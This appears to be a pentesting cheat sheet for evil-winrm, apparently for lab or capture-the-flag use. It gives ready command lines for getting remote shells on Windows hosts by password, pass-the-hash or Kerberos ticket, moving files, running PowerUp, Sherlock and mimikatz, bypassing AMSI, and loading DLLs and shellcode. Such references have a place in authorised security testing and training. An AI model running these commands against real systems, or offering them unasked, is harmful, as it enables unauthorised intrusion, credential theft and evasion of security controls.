Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Connect
evil-winrm -i TARGET -u user -p 'password'
evil-winrm -i TARGET -u 'DOMAIN\user' -p 'password'
evil-winrm -i TARGET -u user -H NTLM_HASH
With SSL (Port 5986)
evil-winrm -i TARGET -u user -p 'password' -S
File Transfer
*Evil-WinRM* PS> upload /local/path/file.exe C:\Windows\Temp\file.exe
*Evil-WinRM* PS> download C:\Users\admin\Desktop\flag.txt /tmp/flag.txt
Load PowerShell Scripts
evil-winrm -i TARGET -u user -p 'password' -s /opt/scripts/
*Evil-WinRM* PS> PowerUp.ps1
*Evil-WinRM* PS> Invoke-AllChecks
*Evil-WinRM* PS> Sherlock.ps1
*Evil-WinRM* PS> Find-AllVulns
Load Binaries
evil-winrm -i TARGET -u user -p 'password' -e /opt/binaries/
*Evil-WinRM* PS> Invoke-Binary /opt/binaries/mimikatz.exe
*Evil-WinRM* PS> menu
*Evil-WinRM* PS> Bypass-4MSI # AMSI bypass
*Evil-WinRM* PS> Dll-Loader # Load DLL
*Evil-WinRM* PS> Donut-Loader # Shellcode loader
With Kerberos Ticket
export KRB5CCNAME=ticket.ccache
evil-winrm -i TARGET -r DOMAIN
Quick Reference
| Task | Command |
|---|
| Login | evil-winrm -i TARGET -u user -p pass |
| PtH | evil-winrm -i TARGET -u user -H HASH |
| Upload | upload /local/file C:\remote\path |
| Scripts | -s /path/ then Script.ps1 in shell |
| AMSI bypass | Bypass-4MSI |